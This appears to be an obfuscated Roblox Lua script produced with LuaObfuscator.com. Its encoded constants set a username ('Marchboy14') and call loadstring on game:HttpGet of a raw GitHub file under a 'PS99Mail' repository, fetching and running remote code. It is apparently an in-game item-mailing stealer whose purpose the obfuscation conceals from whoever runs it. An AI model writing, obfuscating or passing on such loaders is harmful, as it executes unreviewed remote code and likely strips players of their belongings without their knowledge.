--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.0) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v83=0 -0 ;local v84;while true do if (v83==(0 -0)) then v84=(v31/((3 -1)^(v32-(2 -(1638 -(1523 + 114))))))%(((559 + 62) -(555 + 64))^(((v33-(932 -(857 + 74))) -(v32-1)) + (569 -(367 + 201)))) ;return v84-(v84%(928 -(214 + 713))) ;end end else local v85=2^(v32-((1 -0) + 0)) ;return (((v31%(v85 + v85))>=v85) and ((1066 -(68 + 997)) + 0)) or (877 -(282 + 595)) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=1270 -(226 + 1044) ;local v35;local v36;local v37;local v38;while true do if (v34==(0 -0)) then v35,v36,v37,v38=v1(v16,v19,v19 + (120 -(32 + 85)) );v19=v19 + 4 + 0 ;v34=1 + 0 ;end if (v34==(958 -(892 + 65))) then return (v38 * (40022563 -23245347)) + (v37 * ((222388 -101250) -55602)) + (v36 * (606 -(87 + 263))) + v35 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=0 -0 ;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v39==0) then v40=0 -0 ;v41=nil;v39=2 -1 ;end if (v39~=2) then else v44=nil;v45=nil;v39=3;end if (v39~=(9 -6)) then else v46=nil;while true do local v89=0;local v90;while true do if (v89==(1047 -(67 + 980))) then v90=0;while true do if ((1474 -(1329 + 145))~=v90) then else if (v40==(974 -(140 + 831))) then local v99=0;while true do if (v99==0) then for v154=1,v24() do v42[v154-1 ]=v29();end return v44;end end end if (v40==(1850 -(1409 + 441))) then local v100=0;while true do if (v100~=0) then else v41={};v42={};v100=719 -(15 + 703) ;end if (v100==1) then v43={};v40=1 + 0 ;break;end end end v90=1;end if ((439 -(262 + 176))==v90) then if (v40~=(1723 -(345 + 1376))) then else for v104=689 -(198 + 490) ,v45 do local v105=0;local v106;local v107;local v108;local v109;while true do if (v105~=1) then else v108=nil;v109=nil;v105=8 -6 ;end if (0~=v105) then else v106=0 -0 ;v107=nil;v105=1;end if (v105==(1208 -(696 + 510))) then while true do if (v106~=(1 -0)) then else v109=nil;while true do if (v107~=(1263 -(1091 + 171))) then else if (v108==1) then v109=v22()~=(0 + 0) ;elseif (v108==2) then v109=v25();elseif (v108~=3) then else v109=v26();end v46[v104]=v109;break;end if (v107==0) then local v173=0 -0 ;local v174;while true do if (v173==(0 -0)) then v174=374 -(123 + 251) ;while true do if (v174==0) then v108=v22();v109=nil;v174=4 -3 ;end if (v174==(699 -(208 + 490))) then v107=1;break;end end break;end end end end break;end if (v106~=(0 + 0)) then else v107=0 + 0 ;v108=nil;v106=1;end end break;end end end v44[839 -(660 + 176) ]=v22();for v110=1 + 0 ,v24() do local v111=202 -(14 + 188) ;local v112;local v113;while true do if (v111~=1) then else while true do if (v112==(675 -(534 + 141))) then v113=v22();if (v21(v113,1,1)~=0) then else local v166=0 + 0 ;local v167;local v168;local v169;local v170;local v171;while true do if (v166~=(0 + 0)) then else v167=0 + 0 ;v168=nil;v166=1;end if (v166~=1) then else local v175=0 -0 ;while true do if ((1 -0)==v175) then v166=2;break;end if (v175~=(0 -0)) then else v169=nil;v170=nil;v175=1;end end end if (v166~=(2 + 0)) then else v171=nil;while true do if (v167~=(1 + 0)) then else v170=nil;v171=nil;v167=2;end if (v167~=2) then else while true do if ((398 -(115 + 281))~=v168) then else local v176=0;local v177;while true do if (v176~=(0 -0)) then else v177=0;while true do if (1~=v177) then else v168=3 + 0 ;break;end if (v177~=0) then else if (v21(v170,2 -1 ,1)~=(3 -2)) then else v171[869 -(550 + 317) ]=v46[v171[2 -0 ]];end if (v21(v170,2,2)==1) then v171[3 -0 ]=v46[v171[8 -5 ]];end v177=286 -(134 + 151) ;end end break;end end end if (v168~=3) then else if (v21(v170,1668 -(970 + 695) ,3)==1) then v171[7 -3 ]=v46[v171[1994 -(582 + 1408) ]];end v41[v110]=v171;break;end if (v168~=0) then else local v179=0 -0 ;while true do if (v179==1) then v168=1;break;end if (v179~=0) then else local v185=0 -0 ;local v186;while true do if ((0 -0)==v185) then v186=1824 -(1195 + 629) ;while true do if (v186==1) then v179=1 -0 ;break;end if ((241 -(187 + 54))~=v186) then else local v191=780 -(162 + 618) ;while true do if (v191==0) then v169=v21(v113,2,3 + 0 );v170=v21(v113,3 + 1 ,6);v191=1;end if (v191==(1 -0)) then v186=1;break;end end end end break;end end end end end if (v168==(1 -0)) then local v180=0;local v181;local v182;while true do if (v180~=1) then else while true do if (v181~=0) then else v182=0;while true do if (v182==(1 + 0)) then v168=2;break;end if (v182==0) then local v192=1636 -(1373 + 263) ;while true do if (1~=v192) then else v182=1001 -(451 + 549) ;break;end if ((0 + 0)==v192) then v171={v23(),v23(),nil,nil};if (v169==(0 -0)) then local v193=341 -(218 + 123) ;local v194;while true do if (v193==(1581 -(1535 + 46))) then v194=0;while true do if (v194~=(0 + 0)) then else v171[1 + 2 ]=v23();v171[4]=v23();break;end end break;end end elseif (v169==(561 -(306 + 254))) then v171[1 + 2 ]=v24();elseif (v169==2) then v171[5 -2 ]=v24() -(2^(1483 -(899 + 568))) ;elseif (v169~=3) then else local v199=0 + 0 ;local v200;while true do if (v199==(0 -0)) then v200=0;while true do if (v200~=(603 -(268 + 335))) then else v171[3]=v24() -(2^(306 -(60 + 230))) ;v171[576 -(426 + 146) ]=v23();break;end end break;end end end v192=1 + 0 ;end end end end break;end end break;end if (v180~=0) then else v181=0;v182=nil;v180=1457 -(282 + 1174) ;end end end end break;end if (v167==(811 -(569 + 242))) then v168=0 -0 ;v169=nil;v167=1;end end break;end end end break;end end break;end if (v111~=0) then else v112=0 + 0 ;v113=nil;v111=1025 -(706 + 318) ;end end end v40=3;end if (v40==(1252 -(721 + 530))) then local v102=1271 -(945 + 326) ;local v103;while true do if (v102~=(0 -0)) then else v103=0 + 0 ;while true do if (1==v103) then v46={};v40=2;break;end if (v103==0) then local v159=0;while true do if (v159==1) then v103=701 -(271 + 429) ;break;end if (v159~=(0 + 0)) then else v44={v41,v42,nil,v43};v45=v24();v159=1;end end end end break;end end end break;end end break;end end end break;end if (v39~=1) then else v42=nil;v43=nil;v39=2;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=v24();local v48=v24();local v49=1172 -(418 + 753) ;local v50=(v21(v48,1,75 -55 ) * ((1 + (1213 -(323 + 889)))^(4 + 28))) + v47 ;local v51=v21(v48,7 + 14 ,22 + 9 );local v52=((v21(v48,70 -38 )==(1 + 0)) and  -(530 -(406 + 123))) or (1770 -(1749 + 20)) ;if (v51==0) then if (v50==(0 + 0)) then return v52 * (1322 -(1249 + 73)) ;else local v91=0 -0 ;while true do if ((0 + 0)==v91) then v51=1146 -(466 + 679) ;v49=0 -0 ;break;end end end elseif (v51==(5854 -(10247 -6440))) then return ((v50==(1900 -(106 + 1794))) and (v52 * ((1 + (580 -(361 + 219)))/0))) or (v52 * NaN) ;end return v8(v52,v51-(259 + 764) ) * (v49 + (v50/((5 -3)^(140 -(408 -(53 + 267)))))) ;end v26=nil;function v26(v53)local v54;if  not v53 then v53=v24();if (v53==(0 + 0)) then return "";end end v54=v3(v16,v19,(v19 + v53) -(983 -(18 + 964)) );v19=v19 + v53 ;local v55={};for v67=3 -2 , #v54 do v55[v67]=v2(v1(v3(v54,v67,v67)));end return v6(v55);end v18=5;end if (v18==2) then function v22()local v56=v1(v16,v19,v19);v19=v19 + 1 ;return v56;end v23=nil;function v23()local v57=0 + 0 + 0 ;local v58;local v59;while true do if (v57==(1 + 0)) then return (v59 * (1106 -(20 + 830))) + v58 ;end if (v57==(0 + 0)) then v58,v59=v1(v16,v19,v19 + 2 );v19=v19 + 2 ;v57=127 -(116 + 10) ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v60)if (v1(v60,2)==79) then v20=v0(v3(v60,1,1));return "";else local v86=v2(v0(v60,16));if v20 then local v92=v5(v86,v20);v20=nil;return v92;else return v86;end end end);v18=1;end if (v18==7) then function v30(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v28;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v87=0,v77 do if (v87>=v71) then v75[v87-v71 ]=v76[v87 + 1 ];else v79[v87]=v76[v87 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do local v88=0;while true do if (v88==0) then v81=v69[v73];v82=v81[1];v88=1;end if (v88==1) then if (v82<=8) then if (v82<=3) then if (v82<=1) then if (v82==0) then do return;end else v63[v81[3]]=v79[v81[2]];end elseif (v82==2) then do return;end else v63[v81[3]]=v79[v81[2]];end elseif (v82<=5) then if (v82==4) then local v118=v81[2];local v119=v79[v81[3]];v79[v118 + 1 ]=v119;v79[v118]=v119[v81[4]];else v79[v81[2]]=v81[3];end elseif (v82<=6) then v79[v81[2]]=v81[3]~=0 ;elseif (v82==7) then local v142=0;local v143;local v144;local v145;local v146;while true do if (v142==1) then v74=(v145 + v143) -1 ;v146=0;v142=2;end if (v142==2) then for v161=v143,v74 do v146=v146 + 1 ;v79[v161]=v144[v146];end break;end if (v142==0) then v143=v81[2];v144,v145=v72(v79[v143](v13(v79,v143 + 1 ,v81[3])));v142=1;end end else v79[v81[2]]();end elseif (v82<=12) then if (v82<=10) then if (v82>9) then v79[v81[2]]=v81[3];else local v128=0;local v129;local v130;local v131;local v132;while true do if (v128==2) then for v157=v129,v74 do local v158=0;while true do if (v158==0) then v132=v132 + 1 ;v79[v157]=v130[v132];break;end end end break;end if (v128==1) then v74=(v131 + v129) -1 ;v132=0;v128=2;end if (v128==0) then v129=v81[2];v130,v131=v72(v79[v129](v13(v79,v129 + 1 ,v81[3])));v128=1;end end end elseif (v82==11) then local v133=v81[2];v79[v133]=v79[v133](v13(v79,v133 + 1 ,v74));else local v135=v81[2];v79[v135]=v79[v135](v13(v79,v135 + 1 ,v74));end elseif (v82<=14) then if (v82==13) then if ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v63;else v79[v81[2]]=v63[v81[3]];end elseif ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v63;else v79[v81[2]]=v63[v81[3]];end elseif (v82<=15) then local v137=v81[2];local v138=v79[v81[3]];v79[v137 + 1 ]=v138;v79[v137]=v138[v81[4]];elseif (v82==16) then v79[v81[2]]();else v79[v81[2]]=v81[3]~=0 ;end v73=v73 + 1 ;break;end end end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!093O0003083O00557365726E616D65030A3O004D61726368626F79313403153O0073656C65637465644C6F6164696E675363722O656E03013O0034030D3O004C6F6164696E675363722O656E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F7269000E3O00120A3O00023O0012013O00013O00120A3O00043O0012013O00034O00113O00013O0012013O00053O00120D3O00063O00120D000100073O00200F00010001000800120A000300094O0007000100034O000B5O00022O00103O000100012O00023O00017O00",v9(),...);
